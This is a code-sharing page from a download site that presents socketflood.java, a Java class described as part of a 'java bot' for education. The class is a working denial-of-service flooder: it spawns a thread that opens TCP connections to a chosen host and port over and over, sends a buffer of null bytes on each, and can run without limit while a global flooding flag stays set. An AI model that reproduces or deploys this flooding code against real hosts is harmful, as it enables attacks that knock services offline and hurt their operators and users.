⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 socketflood.java

📁 this is a sample of a java bot. use to educate..
💻 JAVA
字号:
import java.net.Socket;
import java.io.IOException;

class SocketFlood extends Thread {

	private String host;
	private int port;
	private int connections;
	private int delay;

	private int count = 0;

	public SocketFlood(String host, int port, int connections, int delay) {
		this.host = host;
		this.port = port;
		this.connections = connections;
		this.delay = delay;
		this.start();
	}

	public void run() {
		while(FloodingStatus.socketFlooding && (this.count < this.connections || this.connections == 0)) {
			try {
				Socket socket = new Socket(this.host, this.port);
				byte[] buffer = new byte[1024];
				socket.getOutputStream().write(buffer, 0, buffer.length);
				buffer = null;
				socket = null;
				count++;
			} catch(IOException ioe) {
			} finally {
				try {
					this.sleep(this.delay);
				} catch(InterruptedException ie) {
				}
			}
		}
	}

}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -